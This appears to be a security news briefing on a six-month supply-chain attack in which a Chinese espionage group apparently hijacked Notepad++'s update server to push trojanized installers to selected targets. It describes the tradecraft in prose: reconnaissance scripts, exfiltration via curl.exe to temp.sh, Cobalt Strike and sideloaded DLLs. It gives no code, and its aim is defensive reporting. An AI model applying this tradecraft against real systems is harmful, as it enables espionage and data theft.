Notepad++ Update Mechanism Hijacked in Six-Month Chinese Espionage Campaign: A Deep Dive
How Chinese APT Lotus Blossom turned Notepad++'s trusted update system into a precision espionage tool for six months without detection.
From The Bit Baker Daily Briefing — February 8, 2026
Six months. That's how long one of the world's most widely installed text editors was quietly ferrying espionage payloads to carefully chosen government targets across Southeast Asia — and nobody caught it. The attackers didn't find some clever zero-day in Notepad++ itself. They went after something far more dangerous: the trust infrastructure between the software and the people who rely on it.
Chinese state-sponsored group Lotus Blossom (also tracked as Billbug and Chrysalis) hijacked Notepad++'s WinGUP update mechanism by seizing control of the shared hosting server responsible for distributing updates. Between June and December 2025, the group surgically pushed trojanized NSIS installers to targets in Vietnam, the Philippines, El Salvador, and Australia. Their toolkit was comprehensive — Cobalt Strike Beacons, sideloaded DLLs (log.dll), and Metasploit downloaders — everything needed for persistent access and quiet data theft.
The truly unsettling part? Selectivity. Notepad++ has north of 10 million active installations. The overwhelming majority of those users got perfectly clean updates the entire time. Only machines matching specific targeting criteria received the weaponized versions. That surgical precision is exactly what made this campaign so hard to spot through automated detection.
Why It Matters
Supply chain attacks have become a recurring nightmare, but the craft behind this one deserves close attention. SolarWinds in 2020 showed the world what a compromised update pipeline could do at scale. The 3CX incident in 2023 proved communications software was just as vulnerable. Now Notepad++ — a humble, almost universally trusted text editor — joins that list. No application is too small or too simple to become a delivery vehicle when the distribution layer is the target.
The geographic footprint is telling. Vietnam, the Philippines, Australia — all nations with deep strategic stakes in the South China Sea and the wider Indo-Pacific. El Salvador is the outlier, though financial or diplomatic intelligence collection would explain its presence. The operators weren't casting a wide net. Government agencies and financial institutions were the marks, not random endpoints. This was old-school espionage with a modern wrapper.
I think what makes this genuinely frightening is the irony at the center of it. Security teams drill the same message endlessly: patch your software, accept updates, stay current. Here, the organizations that followed that advice most diligently were the ones who got burned.
What's Under the Hood
The attack unfolded in carefully sequenced stages. First, the operators compromised the shared hosting server behind Notepad++ updates — handing them the keys to the entire download pipeline. From that position, they tampered with the WinGUP auto-updater so it would serve malicious NSIS installers that, to any user watching the process, looked entirely normal.
Before dropping heavy payloads, the attackers ran reconnaissance. AutoUpdater.exe and embedded Lua scripts fingerprinted victim machines, deciding whether each target was worth pursuing. Exfiltrated profiling data went out through curl.exe to temp.sh, a temporary file-sharing service — a smart choice that kept command-and-control traffic looking like mundane web activity. Only after confirming a machine's intelligence value did the operators escalate: Cobalt Strike Beacons for persistent C2, sideloaded DLLs to survive reboots, Metasploit downloaders as a fallback if primary channels got disrupted.
Selective delivery was the campaign's survival mechanism. By refusing to trigger indiscriminately, the operators dodged the mass anomaly signals that eventually unraveled SolarWinds. A security vendor scanning Notepad++ updates during this window would have pulled clean files every time — unless they happened to be operating from inside a targeted network. Clever and infuriating in equal measure.
Notepad++ shipped v8.9.1 in response, introducing XML signature validation for updates. Published IoCs from Rapid7, Kaspersky, and Orca Security cover file hashes, C2 domains, and behavioral indicators tied to the Cobalt Strike and Metasploit payloads.
What to Watch
- How the open-source ecosystem absorbs the lesson. If a project as prominent as Notepad++ — millions of users, active development — was exposed through shared hosting, smaller projects running on tighter budgets face even steeper odds. Expect growing pressure for mandatory code signing, reproducible builds, and dedicated distribution infrastructure.
- Whether other WinGUP-dependent applications got caught in the blast. WinGUP is a generic update framework, not exclusive to Notepad++. If the hosting compromise reached beyond a single distribution path, the scope of damage may be wider than anyone currently realizes.
- The forensic timeline and its implications. Six months of dwell time is an eternity. Organizations in targeted regions need to conduct retrospective threat hunts using the published indicators — compromise could predate the public disclosure by months, and lateral movement may already be deeply embedded in affected networks.